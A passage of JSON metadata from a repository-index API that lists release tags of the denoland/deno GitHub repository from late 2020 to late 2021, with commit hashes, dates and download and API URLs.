deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts